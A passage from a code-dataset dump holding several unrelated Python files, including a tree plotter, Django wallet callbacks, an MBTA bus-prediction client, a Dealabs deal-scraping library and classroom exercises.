self.height\n\n @staticmethod\n def _(x, y):\n if TPObject.b_vertical:\n return x, y\n else:\n return y, x\n\n\nclass TPArc(TPObject):\n f_arrow_offset = 0.05\n\n def __init__(self, color, name='', start=None, end=None):\n self.start = start # node\n self.end = end # node\n TPObject.__init__(self, name, color)\n self.ax = None\n self.graph = None\n self.text = None\n self.rad = (random()*0.4 - 0.2)\n\n def draw(self, ax):\n ex_kwargs = None\n if self.start is None:\n ex_kwargs = dict(xy=self._(self.end.left+self.end.width/2, self.end.top))\n elif self.end is not None:\n ex_kwargs = dict(arrowprops=dict(arrowstyle=\"<|-\",\n connectionstyle=\"arc3,rad=%f\" % self.rad,\n fc=\"black\"),\n xy=self._(self.start.left + self.start.width / 2, self.start.top),\n xytext=self._(self.end.left + self.end.width / 2, self.end.top))\n if ex_kwargs is not None:\n self.graph = ax.annotate(self.end.name,\n size=20, va=\"top\", ha=\"center\",\n xycoords='data',\n textcoords='data',\n bbox=dict(boxstyle=\"round4\", fc='black', alpha=.25),\n color=self.end.msgforecolor,\n **ex_kwargs)\n if self.is_valid():\n self.text = ax.annotate(self.name,\n xy=self._(self.left+self.width/2.0,\n self.top+self.height/2.0),\n xycoords='data',\n color=self._fore_color,\n ha='center')\n self.ax = ax\n\n def redraw(self):\n if self.graph is not None:\n self.graph.remove()\n del self.graph\n if self.text is not None:\n self.text.remove()\n del self.text\n if self.ax is not None:\n self.draw(self.ax)\n\n def is_valid(self):\n return self.start is not None and self.end is not None\n\n ##############\n # properties #\n ##############\n @property\n def left(self):\n if self.is_valid():\n return self.start.left if self.start.left < self.end.left else self.end.left\n\n @property\n def top(self):\n if self.is_valid():\n return self.start.top\n\n @property\n def width(self):\n if self.is_valid():\n return abs(self.start.left - self.end.left)\n\n @property\n def height(self):\n if self.is_valid():\n return self.end.top - self.start.top\n\n\nclass TPNode(TPObject):\n def __init__(self, name, color, **kwargs):\n self.children = []\n self._parent = None\n TPObject.__init__(self, name, color, **kwargs)\n self.arc = TPArc(color, start=self.parent, end=self)\n self.text = None\n self.text_height = 0.2\n\n def calc_rect(self):\n if len(self.children) > 0:\n self.b_vertical = True\n max_child_height = 0\n self.width = 0\n for child in self.children:\n child.left = self.left + self.width\n child.top = self.top + 1\n child.calc_rect()\n self.width += child.width + 1\n if child.height > max_child_height:\n max_child_height = child.height\n self.height = max_child_height + 1\n self.width -= 1\n\n def draw(self, ax):\n self.arc.draw(ax)\n for child in self.children:\n child.draw(ax)\n pass\n\n def redraw(self):\n self.arc.redraw()\n\n def add_child(self, node):\n node.parent = self\n self.children.append(node)\n\n ##############\n # Properties #\n ##############\n @property\n def parent(self):\n return self._parent\n\n @parent.setter\n def parent(self, node):\n self._parent = node\n self.arc.start = node\n\n\nclass TreePlot(RSPlot):\n def __init__(self, tree, width, height, **kwargs):\n RSObject.__init__(self)\n self.tree = tree\n self.width = width\n self.height = height\n self.b_vertical = True\n self.__dict__.update(kwargs)\n\n def plot(self, ax=None, **kwargs):\n fig = plt.figure(figsize=(self.width, self.height))\n ax = fig.add_subplot(111)\n ax.axis('off')\n self.tree.top = 0.1\n self.tree.calc_rect()\n TPObject.b_vertical = self.b_vertical\n ax.set_xlim(-0.1, self.tree.width + 0.1)\n ax.set_ylim(-0.1, self.tree.height / 2 + 0.1)\n self.tree.draw(ax)\n return fig\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n a = TPNode('A', 'red')\n b = TPNode('B', 'blue')\n c = TPNode('C', 'green')\n d = TPNode('D', 'blue')\n e = TPNode('E', 'red')\n f = TPNode('F', 'yellow')\n g = TPNode('G', 'cyan')\n h = TPNode('h', 'pink')\n i = TPNode('i', 'white')\n j = TPNode('j', 'black')\n k = TPNode('k', 'pink')\n l = TPNode('l', 'yellow')\n m = TPNode('m', 'cyan')\n\n a.add_child(b)\n\n a.add_child(k)\n a.add_child(l)\n\n a.add_child(c)\n\n b.add_child(d)\n b.add_child(e)\n b.add_child(m)\n\n c.add_child(f)\n f.add_child(g)\n f.add_child(h)\n f.add_child(i)\n f.add_child(j)\n\n tp = TreePlot(a, 5, 5, b_vertical=True)\n tp.plot()\n plt.show()\n\n","sub_path":"treeplot.py","file_name":"treeplot.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"369923189","text":"from django.db import transaction, connection\n\nfrom betmaster_test import models\nfrom betmaster_test.exceptions import BetmasterError\nfrom betmaster_test.models import TransactionStatus, Wallet, TransactionTypes\n\n\nclass Callbacks:\n\n def success(self, tr: models.Transaction):\n \"\"\"\n Метод должен вызываться в on_success колбэке от платежной системы\n\n Метод блокирует строку wallet, поэтому транзакция его вызывающая\n должна быть как можно короче\n \"\"\"\n assert tr.type == TransactionTypes.DEPOSIT, \"пока поддерживаем только депозиты\"\n\n self.validate(tr)\n\n # блокируем wallet для дальнейшего изменения\n wallet = Wallet.objects.select_for_update().get(id=tr.wallet_id)\n wallet.balance += tr.amount\n wallet.save()\n\n tr.status = TransactionStatus.SUCCESS\n tr.save()\n\n def failure(self, tr: models.Transaction):\n \"\"\"\n Метод должен вызываться в on_error колбэке платежной системы\n \"\"\"\n self.validate(tr)\n\n tr.status = TransactionStatus.FAILED\n tr.save()\n\n def validate(self, tr: models.Transaction):\n if tr.status != TransactionStatus.PROCESSING:\n raise BetmasterError(\"некорректный статус транзакции\", transaction=tr)\n\n","sub_path":"betmaster_test/services/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"495358611","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Filename: test.py\n\nfrom __future__ import print_function\n\n\ndef is_even_num(num):\n if num % 2 == 0:\n return True\n else:\n return False\n\ns = 0\nfor i in range(10):\n if is_even_num(i):\n print(i)\n s += 1\n\nprint(\"has \", s, \" even number\")\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"334386262","text":"\"\"\"MBTA arrival predictions for buses at a given stop from the MBTA.\"\"\"\nimport configparser\nimport datetime\nimport logging\nimport logging.handlers\nimport math\nimport pprint\nimport string\nimport xml.etree.ElementTree as ET\nimport time\nimport requests\n\nconfig = configparser.ConfigParser()\n\ntry:\n assert __name__ == '__main__'\n config.read('mbta.conf')\nexcept AssertionError:\n config.read('infomatic.conf')\nelse:\n pass\nfinally:\n MAXLOGSIZE = config.getint('Logging', 'maxlogsize')\n ROTATIONCOUNT = config.getint('Logging', 'rotationcount')\n LOGFILE = config.get('Logging', 'logfile')\n\n # create logger\n logger = logging.getLogger(__name__)\n # logger.setLevel(logging.INFO)\n logger.setLevel(logging.DEBUG)\n # create file handler which logs even debug messages\n logger_fh = logging.handlers.RotatingFileHandler(LOGFILE,\n maxBytes=MAXLOGSIZE,\n backupCount=ROTATIONCOUNT)\n logger_fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n logger_ch = logging.StreamHandler()\n logger_ch.setLevel(logging.ERROR)\n # create formatter and add it to the handlers\n logger_formatter = logging.Formatter('%(asctime)s'\n + ' %(levelname)s'\n + ' %(name)s[%(process)d]'\n + ' %(message)s')\n logger_fh.setFormatter(logger_formatter)\n logger_ch.setFormatter(logger_formatter)\n # add the handlers to the logger\n logger.addHandler(logger_fh)\n logger.addHandler(logger_ch)\n\n\nclass BusStop(object):\n \"\"\"Class representing a stop for an MBTA bus or buses.\"\"\"\n\n def __init__(self, stop, **kwargs):\n \"\"\"Create Stop object.\"\"\"\n super().__init__(**kwargs)\n try:\n # self.logger = \\\n # logging.getLogger(__name__ + '.' + __name__ + '.'\n # + self.__class__.__name__)\n self.api_key = config.get('MBTA', 'apikey')\n\n self.stop = stop\n logger.info('Instantiating %s %s',\n self.__class__.__name__, self.stop)\n self.base = 'http://realtime.mbta.com/developer/api'\n self.version = 'v2'\n self.endpoint = 'predictionsbystop'\n self.url = self.base + '/' + self.version + '/' + self.endpoint\n self.payload = {'api_key': self.api_key,\n 'stop': self.stop,\n 'format': 'xml'}\n self._predictions_last_updated = time.time()\n self.predictionsbystop()\n self.routesbystop()\n self.schedulebystop()\n self.alertsbystop()\n except Exception as e:\n raise\n finally:\n pass\n\n def predictionsbystop(self):\n \"Docstring goes here.\"\n try:\n BASE = config.get('MBTA', 'base')\n VERSION = config.get('MBTA', 'version')\n _payload = {'api_key': self.api_key,\n 'stop': self.stop,\n 'format': 'xml'}\n _url = BASE + '/' + VERSION + '/predictionsbystop'\n response = requests.get(_url, params=_payload)\n root = ET.fromstring(response.text)\n self._predictions = {}\n self._predictions['routes'] = {}\n for elem in root.iter():\n if elem.tag == 'predictions':\n self._predictions['stop_name'] = elem.get('stop_name')\n self._predictions['stop_id'] = elem.get('stop_id')\n if elem.tag != 'route':\n continue\n self._predictions['routes'][elem.get('route_name')] = {}\n _etas = []\n for trip in elem.iter():\n if trip.tag != 'trip':\n continue\n _etas.append(\n str(math.floor(int(trip.get('pre_away'))\n / 60)) + chr(160) + 'min.')\n _trip_headsign = trip.get('trip_headsign')\n self._predictions['routes'][elem.get(\n 'route_name')]['etas'] = _etas\n self._predictions['routes'][elem.get(\n 'route_name')]['trip_headsign'] = _trip_headsign\n logger.info('Predictions <%s> %s %s [%s]',\n self._predictions['stop_name'],\n elem.get('route_name'),\n _etas, _trip_headsign)\n except Exception as e:\n raise\n finally:\n pass\n\n @property\n def predictions(self):\n pass\n\n @predictions.getter\n def predictions(self):\n _now = time.time()\n if (_now - self._predictions_last_updated) > 59:\n self.predictionsbystop()\n self._predictions_last_updated = _now\n return self._predictions\n\n def routesbystop(self):\n \"Docstring goes here.\"\n try:\n BASE = config.get('MBTA', 'base')\n VERSION = config.get('MBTA', 'version')\n _payload = {'api_key': self.api_key,\n 'stop': self.stop,\n 'format': 'xml'}\n _url = BASE + '/' + VERSION + '/routesbystop'\n response = requests.get(_url, params=_payload)\n root = ET.fromstring(response.text)\n self._routes = [route.get('route_name')\n for route in root.findall('.//*[@route_id]')]\n except Exception as e:\n raise\n finally:\n pass\n\n @property\n def routes(self):\n pass\n\n @routes.getter\n def routes(self):\n return self._routes\n\n def schedulebystop(self):\n \"Docstring goes here.\"\n try:\n BASE = config.get('MBTA', 'base')\n VERSION = config.get('MBTA', 'version')\n _payload = {'api_key': self.api_key,\n 'stop': self.stop,\n 'format': 'xml'}\n _url = BASE + '/' + VERSION + '/schedulebystop'\n response = requests.get(_url, params=_payload)\n root = ET.fromstring(response.text)\n self._schedule = {}\n self._schedule['routes'] = {}\n for elem in root.iter():\n if elem.tag == 'schedule':\n self._schedule['stop_name'] = elem.get('stop_name')\n self._schedule['stop_id'] = elem.get('stop_id')\n if elem.tag != 'route':\n continue\n self._schedule['routes'][elem.get('route_name')] = []\n for trip in elem.iter():\n if trip.tag != 'trip':\n continue\n self._schedule['routes'][elem.get('route_name')].append(\n datetime.datetime.fromtimestamp(\n int(trip.get(\n 'sch_arr_dt'))).strftime('%I:%M:%S %p'))\n except Exception as e:\n raise\n finally:\n pass\n\n @property\n def schedule(self):\n pass\n\n @schedule.getter\n def schedule(self):\n return self._schedule\n\n def alertsbystop(self):\n \"Docstring goes here.\"\n try:\n BASE = config.get('MBTA', 'base')\n VERSION = config.get('MBTA', 'version')\n _payload = {'api_key': self.api_key,\n 'stop': self.stop,\n 'format': 'xml'}\n _url = BASE + '/' + VERSION + '/alertsbystop'\n response = requests.get(_url, params=_payload)\n root = ET.fromstring(response.text)\n self._alerts = {}\n except Exception as e:\n raise\n finally:\n pass\n\n @property\n def alerts(self):\n pass\n\n @alerts.getter\n def alerts(self):\n return self._alerts\n\n\nif __name__ == '__main__':\n pp = pprint.PrettyPrinter(indent=4)\n foo = BusStop('639')\n pp.pprint(foo.predictions)\n pp.pprint(foo.routes)\n pp.pprint(foo.schedule)\n pp.pprint(foo.alerts)\n bar = BusStop('599')\n pp.pprint(bar.predictions)\n pp.pprint(bar.routes)\n pp.pprint(bar.schedule)\n pp.pprint(bar.alerts)\n","sub_path":"mbta/mbta.py","file_name":"mbta.py","file_ext":"py","file_size_in_byte":8339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"628882183","text":"import json\nimport pandas as pd\nimport numpy as np\nfrom pandas.io.json import json_normalize\nimport argparse\nfrom tqdm import tqdm\n\ndef MultiHotEncode(_labels, _scores, n_classes=100):\n '''Return topk labels and scores as multihot encoded vector. \n Missing labels are padded with minus one.\n Missing scores are padded with zeros'''\n retLabels, retScores = [], []\n \n # dimensionality check\n if not len(_labels.shape) == len(_scores.shape):\n raise Exception('Dimensionality must match')\n \n # if only one dimensio\n if len(_labels.shape) == 1:\n multihotlabels = np.negative(np.ones(n_classes))\n multihotscores = np.zeros(n_classes)\n for l, s in zip(_labels, _scores):\n #print(l)\n multihotlabels[l] = l\n multihotscores[l] = s\n retLabels.append(multihotlabels)\n retScores.append(multihotscores)\n \n # mulitple dimension\n else: \n for n in range(_labels.shape[0]):\n multihotlabels = np.negative(np.ones(n_classes))\n multihotscores = np.zeros(n_classes)\n for l, s in zip(_labels[n], _scores[n]):\n #print(l)\n multihotlabels[l] = l\n multihotscores[l] = s\n retLabels.append(multihotlabels)\n retScores.append(multihotscores)\n return np.array(retLabels), np.array(retScores)\n\ndef Confidence(_labels, _scores, n_classes, selection='additive', weights = None):\n '''\n Return the confidence score prediction as an addition of prediction or max selection.\n If weights are given each prediction score are weighted accordingly. \n If sparse prediction vector are provided and prediction labels are not consistent,\n expansion to full dimensionality is performed.\n '''\n \n # transform to numpy arrays\n _labels = np.array(_labels)\n _scores = np.array(_scores)\n \n # weight prediction by multiplying weight vector\n if weights:\n weights = np.array(weights)[:_scores.shape[0]]\n _scores = np.multiply(_scores, weights[:, None])\n\n # if sparse labels does not match transformation to original class space is required\n if n_classes != _labels.shape[0]:\n _labels, _scores = MultiHotEncode(_labels, _scores, n_classes)\n \n # Sum across predtion or take max\n if selection == 'additive':\n _scores = _scores.sum(axis=0)\n elif selection == 'max':\n _scores = _scores.max(axis=0)\n else:\n raise Exception(\"Selection is required. Either 'additive' or 'max'\")\n\n _scores = _scores[_scores != 0]\n _labels = _labels[_labels != -1]\n\n _labels = np.unique(_labels)\n \n # find best prediction\n idx = np.argmax(_scores)\n best = (_labels[idx], _scores[idx])\n \n return best\n\ndef ScoreMargin(_labels, _scores, selection='additive', weights = None):\n '''\n Return the score-margin prediction as a addition of provided predictions or a max selection.\n If weights are given each prediction score are weighted accordingly. \n '''\n \n # transform to numpy arrays\n _labels = np.array(_labels)\n _scores = np.array(_scores)\n \n # weight prediction by multiplying weight vector\n if weights:\n weights = np.array(weights)[:_scores.shape[0]]\n _scores = np.multiply(_scores, weights[:, None])\n\n # create list of labels from prediction with no duplicates and corresponding score list\n labellist = []\n scorelist = []\n for label, score in zip(_labels,_scores):\n _score_margin = (score[0] - score[1])\n if selection == 'additive':\n if label[0] not in labellist:\n labellist.append(label[0].astype(int))\n scorelist.append(_score_margin)\n else:\n idx = labellist.index(label[0])\n scorelist[idx] += _score_margin\n if selection == 'max':\n if label[0] not in labellist:\n labellist.append(label[0].astype(int))\n scorelist.append(_score_margin)\n ##### should i sort??? i font think so...\n # find best prediction\n idx = np.argmax(np.array(scorelist))\n best = (labellist[idx], scorelist[idx])\n return best\n\ndef delay_threshold_test(df, n_classes, platform, model_type):\n post_prediction = pd.DataFrame()\n for delay_threshold in tqdm(np.arange(0, 451,1)):\n n = conventional = maximum = addition = addition_w = missed = sm_additive = sm_additive_w = sm_max = 0\n if model_type == 'msdnet':\n n_exits = 5\n elif model_type == 'b-resnet' or model_type == 'b-densenet':\n n_exits = 4\n else:\n n_exits = 1\n which_exits = np.zeros(n_exits)\n for i, data in df.groupby(['sample']):\n # find predictions within time frame\n\n timings = data['time'].tolist()\n cum_timings = np.cumsum(timings)\n exits = len([time for time in cum_timings if time < delay_threshold])\n \n n += 1\n if exits != 0:\n \n which_exits[exits-1] += 1\n\n # filter predictions within time frame\n #labels, scores = np.array(data.prediction.tolist()[:exits]), np.array(data.scores.tolist()[:exits])\n\n #score_additive_w = ScoreMargin(labels, scores, 'additive', args.weights)\n #score_additive = ScoreMargin(labels, scores, 'additive')\n #score_max = ScoreMargin(labels, scores, 'max')\n\n #labels, scores = MultiHotEncode(labels,scores)\n #addtest = Confidence(labels, scores, n_classes, selection='additive')\n #addtest_w = Confidence(labels, scores, n_classes, selection='additive', weights=args.weights)\n \n \n #maxtest = Confidence(labels, scores, n_classes, selection='max')\n target = data.target.tolist()\n\n #addition_w += (addtest_w[0]== target[0])\n #addition += (addtest[0]==target[0])\n #maximum += (maxtest[0] == target[0])\n conventional += (target[0] == data.prediction.tolist()[exits-1][0])\n #sm_additive_w += (target[0] == score_additive_w[0])\n #sm_additive += (target[0] == score_additive[0])\n #sm_max += (target[0]==score_max[0])\n else:\n missed +=1\n\n if n != 0:\n post_prediction = post_prediction.append({\n 'Delay Threshold': delay_threshold,\n 'Exit' : which_exits,\n 'N': n,\n 'missed': missed,\n 'latest': conventional / n,\n #'confidence (max)' : maximum / n,\n #'confidence (add)' : addition / n,\n #'confidence (add,weighted)' : addition_w / n,\n #'score-margin (max)' : sm_max / n,\n #'score_margin (add)' : sm_additive / n,\n #'score-margin (add,weighted)' : sm_additive_w / n\n }, ignore_index = True)\n else:\n post_prediction = post_prediction.append({\n 'Delay Threshold': delay_threshold,\n 'N': n+missed\n }, ignore_index = True)\n\n print(post_prediction)\n post_prediction.to_json('edge_test/' + platform + '_merge_' + model_type + '_analysis.json')\n\ndef lost_prediction_test(df, args):\n \n post_prediction = []\n if args.model_type == 'msdnet':\n exits = 5\n else:\n exits = 4\n for k in range(1,exits+1):\n\n n = conventional = maximum = addition = addition_w = sm_additive = sm_additive_w = sm_max = 0\n for _, data in df.groupby(['sample']):\n n += 1\n labels, scores = np.array(data.prediction.tolist()[:k]), np.array(data.scores.tolist()[:k])\n\n score_additive_w = ScoreMargin(labels, scores, 'additive', weights=args.weights)\n score_additive = ScoreMargin(labels, scores, 'additive')\n score_max = ScoreMargin(labels, scores, 'max')\n\n labels, scores = MultiHotEncode(labels,scores)\n addtest = Confidence(labels, scores, selection='additive')\n addtest_w = Confidence(labels, scores, selection='additive', weights=args.weights)\n \n \n maxtest = Confidence(labels, scores, selection='max')\n target = data.target.tolist()\n\n addition_w += (addtest_w[0]== target[0])\n addition += (addtest[0]==target[0])\n maximum += (maxtest[0] == target[0])\n conventional += (target[0] == data.prediction.tolist()[k-1][0])\n sm_additive_w += (target[0] == score_additive_w[0])\n sm_additive += (target[0] == score_additive[0])\n sm_max += (target[0]==score_max[0])\n\n post_prediction.append({\n 'exit' : k-1,\n 'N Exits' : n,\n 'latest': conventional / n,\n 'confidence (max)' : maximum / n,\n 'confidence (add)' : addition / n,\n 'confidence (add,weighted)' : addition_w / n,\n 'score-margin (max)' : sm_max / n,\n 'score_margin (add)' : sm_additive / n,\n 'score-margin (add,weighted)' : sm_additive_w / n\n })\n\n post_prediction = pd.DataFrame(post_prediction)\n post_prediction.to_json(args.name +'_lost_prediction_analysis.json')\n\ndef main(platform, model_type, test):\n with open('local/' + platform + '_' + model_type + '_offload.json', 'r') as json_file:\n data = json.load(json_file)\n\n df = pd.DataFrame()\n df = json_normalize(data,)\n\n if test == 'delay-threshold':\n delay_threshold_test(df, 100, platform, model_type)\n elif args.test == 'lost-prediction':\n lost_prediction_test(df, args)\n else:\n raise Exception('test must be specified')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Analyze edge offloading results')\n parser.add_argument('--platform', default='gpu')\n parser.add_argument('--test', default='delay-threshold'),\n parser.add_argument('--model-type', default='b-resnet'),\n parser.add_argument('--weights', default=[1,1.2,1.4,1.6,1.6])\n args = parser.parse_args()\n with open('local/' + args.platform + '_local_' + args.model_type + '.json', 'r') as json_file:\n data = json.load(json_file)\n\n df = pd.DataFrame()\n df = json_normalize(data,)\n\n if args.test == 'delay-threshold':\n delay_threshold_test(df, 100, args.platform, args.model_type)\n elif args.test == 'lost-prediction':\n lost_prediction_test(df, args)\n else:\n raise Exception('test must be specified')\n ","sub_path":"DDNN/analyze_local.py","file_name":"analyze_local.py","file_ext":"py","file_size_in_byte":10639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"221336285","text":"#!/usr/bin/env python\nimport serial\n\n\nwith serial.Serial('/dev/ttyS11', 115200) as ser:\n x = ser.read(5) # read one byte\n print(x)\n # s = ser.read(10) # read up to ten bytes (timeout)\n # print(s)\n # line = ser.readline() # read a '\\n' terminated line\n # print line\n","sub_path":"python_serial/serial_reciever.py","file_name":"serial_reciever.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440761680","text":"from urllib.request import urlopen\nimport socket\nimport os\nimport pymongo\nimport logging\nfrom bs4 import BeautifulSoup\nfrom crontab import CronTab\nimport datetime as dt\nfrom time import strptime, mktime\nimport numpy as np\nimport re\nfrom email.mime.text import MIMEText\nfrom subprocess import Popen, PIPE\n \ndef set_next_start(delay):\n next_start = dt.datetime.now() + dt.timedelta(minutes=delay)\n tab = CronTab()\n cmd = 'python3 /home/louis/prog/Dealabs/daemon.py'\n cron_job = tab.new(cmd, comment='Dealabs daemon')\n cron_job.setall(next_start)\n #writes content to crontab\n tab.write_to_user(user=True)\n\ndef get_delay(mu, sigma):\n delay = max(int(np.random.normal(mu, sigma)), 1)\n return delay\n\ndef is_night():\n now = dt.datetime.now()\n return dt.time(0,30) <= now.time() <= dt.time(6,30)\n\ndef is_flame(soup):\n flame = False\n for img in soup.find_all('img', alt=True):\n if 'flamme' in img['alt']: \n flame = True\n return flame\n\ndef fetch_url(url):\n try:\n response = urlopen(url, timeout = 3) \n if response:\n content = response.read()\n response.close()\n return content\n else : \n print('Deal not fetched')\n raise\n except socket.error as socketerror:\n print(\"Request timed out\")\n print(\"Error: \", socketerror)\n raise\n\ndef get_raw_body(soup):\n raw_body = soup.find('div', {'class' : 'margin_gesture'})\n return raw_body\n\ndef get_raw_comments(soup):\n raw_comments = soup.find('div', {'class' : 'body_detail_page'})\n return raw_comments \n\n# This function is faster if you need both title and seller\ndef get_title_seller(soup):\n title = soup.find('h1', {\"class\" : \"text_color_333333\"})\n title = ''.join(title.find_all(text = True)).replace(\"Expiré\",'')\n titleSplit = title.split(' @ ')\n title = titleSplit[0]\n seller = titleSplit[1]\n return (title, seller)\n\ndef get_title(content):\n return get_title_seller(content)[0]\n\ndef get_seller(soup):\n return get_title_seller(soup)[1]\n\ndef get_temperature(soup):\n temperature = soup.find('div', {'class' : 'temperature_div'}).p.string\n if temperature == \"new\" : \n temperature = 0\n else : \n temperature = temperature.replace('°','')\n temperature = int(temperature)\n return temperature\n\ndef get_description(soup):\n desc = soup.find('div', {\"class\" : \"description text_color_333333\"}) \n desc = ''.join(desc.find_all(text = True))\n return desc\n\n# This function is faster if you need both name and url\ndef get_poster_name_url(soup):\n poster = soup.find('div', {\"class\" : \"poster_profil_div\"})\n poster_name = poster.a.string\n poster_url = poster.a['href']\n return (poster_name, poster_url)\n\ndef get_poster_name(soup):\n return get_poster_name_url(soup)[0]\n\ndef get_poster_url(soup):\n return get_poster_name_url(soup)[1]\n\ndef get_dates(soup):\n date_string = soup.find('p', {\"class\" : \"dates_deal text_color_b4b4b4\"})\n date_string = ''.join(date_string.find_all(text = True))\n i = date_string.find(\"Post\")\n date_string = date_string[i : ]\n i = date_string.find(\"le\") + 3\n date = date_string[i : i + 10 ]\n time = date_string[i+13 : i+18]\n time = time.replace('h', ':')\n posted_date = strptime(date + ' ' + time, '%d/%m/%Y %H:%M')\n \n hot_date = None\n hot_time = None\n i = date_string.find(\"Rendu hot\")\n if i != -1:\n date_string = date_string[i : ]\n i = date_string.find(\"le\") + 3\n date = date_string[i : i + 10 ]\n time = date_string[i+13 : i+18]\n time = time.replace('h', ':')\n hot_date = strptime(date + ' ' + time, '%d/%m/%Y %H:%M')\n hot_time = int(mktime(hot_date) - mktime(posted_date))\n\n return (posted_date, hot_date, hot_time)\n\ndef get_posted_date(soup):\n return get_dates(soup)[0]\n\ndef get_hot_date(soup):\n return get_dates(soup)[1]\n \ndef clean_text(text):\n # Remove non-letters\n letters_only = re.sub(\"[^0-9a-zA-Zéèàâêôûîùïë]\", \" \", text)\n words = letters_only.lower().split() \n # Searching a set is much faster than searching a list, so convert the stop words to a set\n stops = set(['au', 'aux', 'avec', 'ce', 'ces', 'dans', 'de', 'des', 'du', \n 'elle', 'en', 'et', 'eux', 'il', 'je', 'la', 'le', 'leur', \n 'lui', 'ma', 'mais', 'me', 'même', 'mes', 'moi', 'mon', 'ne', \n 'nos', 'notre', 'nous', 'on', 'ou', 'par', 'pas', 'pour', 'qu', \n 'que', 'qui', 'sa', 'se', 'ses', 'son', 'sur', 'ta', 'te', 'tes', \n 'toi', 'ton', 'tu', 'un', 'une', 'vos', 'votre', 'vous', 'c', 'd', \n 'j', 'l', 'à', 'm', 'n', 's', 't', 'y', 'été', 'étée', 'étées', \n 'étés', 'étant', 'étante', 'étants', 'étantes', 'suis', 'es', \n 'est', 'sommes', 'êtes', 'sont', 'serai', 'seras', 'sera', 'serons', \n 'serez', 'seront', 'serais', 'serait', 'serions', 'seriez', 'seraient', \n 'étais', 'était', 'étions', 'étiez', 'étaient', 'fus', 'fut', 'fûmes', \n 'fûtes', 'furent', 'sois', 'soit', 'soyons', 'soyez', 'soient', 'fusse', \n 'fusses', 'fût', 'fussions', 'fussiez', 'fussent', 'ayant', 'ayante', \n 'ayantes', 'ayants', 'eu', 'eue', 'eues', 'eus', 'ai', 'as', 'avons', \n 'avez', 'ont', 'aurai', 'auras', 'aura', 'aurons', 'aurez', 'auront', \n 'aurais', 'aurait', 'aurions', 'auriez', 'auraient', 'avais', 'avait', \n 'avions', 'aviez', 'avaient', 'eut', 'eûmes', 'eûtes', 'eurent', 'aie', \n 'aies', 'ait', 'ayons', 'ayez', 'aient', 'eusse', 'eusses', 'eût', \n 'eussions', 'eussiez', 'eussent'])\n meaningful_words = [w for w in words if not w in stops] \n # TODO: add stemming \n return( \" \".join( meaningful_words )) \n\n\ndef get_db(): \n client = pymongo.MongoClient('192.168.0.141', 27017)\n db = client.dealabs\n return db\n\ndef send_message(subject, body):\n print('Sending message: '+ subject)\n emails = [\"louisrtm@gmail.com\", \"j.parmoli@yahoo.fr\"]\n for email in emails:\n msg = MIMEText(body)\n msg[\"From\"] = \"alert@lrt.ovh\"\n msg[\"To\"] = email\n msg[\"Subject\"] = subject\n p = Popen([\"/usr/sbin/sendmail\", \"-t\", \"-oi\"], stdin=PIPE, universal_newlines=True)\n p.communicate(msg.as_string())","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"498757158","text":"import json\nfrom django.http import HttpResponse\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\n\ndef index(request):\n # Reading data back\n with open('app/static/json/blogList.json', 'rb') as f:\n resp = json.load(f)\n\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n\ndef item(request, article_id):\n url = 'http://wcf.open.cnblogs.com/blog/post/body/' + str(article_id)\n req = urllib.request.Request(url)\n webpage = urllib.request.urlopen(req)\n html = webpage.read()\n soup = BeautifulSoup(html, 'html.parser') # 文档对象\n data = soup.find_all('string')[0].string\n\n return HttpResponse(data)\n","sub_path":"app/api/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649233538","text":"cont = 1\n# sexo\nhomem = 0\nmulher = 0\n# alturas\nAlt_homem = 0.0\nAlt_mulher = 0.0\n# altura maior e menor\nmaior_homem = 0\nmenor_homem = 0\nmaior_mulher = 0 \nmenor_mulher = 0 \n\n# Para calcular a altura média das mulheres\nSoma_altura_mulher = 0 \n\nwhile cont <= 50:\n sexo = input(\"Digite M (masculino) e F (Feminino): \")\n\n if sexo == \"M\":\n homem = homem + 1\n Alt_homem = float(input(\"Digite sua altura\"))\n # verifica se é maior ou menor\n if Alt_homem >= maior_homem:\n maior_homem = Alt_homem\n elif Alt_homem >= menor_homem:\n menor_homem = Alt_homem\n cont = cont + 1\n elif sexo == \"F\":\n mulher = mulher + 1\n Alt_mulher = float(input(\"Digite sua altura\"))\n #soma da altura de mulheres\n Soma_altura_mulher = Soma_altura_mulher + Alt_mulher\n\n # verifica se é maior ou menor\n if Alt_mulher >= maior_mulher:\n maior_mulher = Alt_mulher\n elif Alt_mulher >= menor_mulher:\n menor_mulher = Alt_mulher\n cont = cont + 1\n else:\n print(\"sexo inválido\")\n\n# resultados\nprint(\"A Altura maior e menor entre: \\n Homens: \", maior_homem, menor_homem, \" \\n Mulheres: \", maior_mulher, menor_mulher)\nprint(Soma_altura_mulher/mulher)\nprint(\"Numero de Homen: \", homem)\n\n# percentuais\nper_homem = (homem / 50) * 100\nper_mulher = (mulher / 50) * 100\ndif_percentual = per_homem - per_mulher\nprint(\"A diferença de percentual entre homens e as mulheres é: \", dif_percentual)","sub_path":"LaçoRepetição/List exercício 3/exer18.py","file_name":"exer18.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148397385","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.properties import 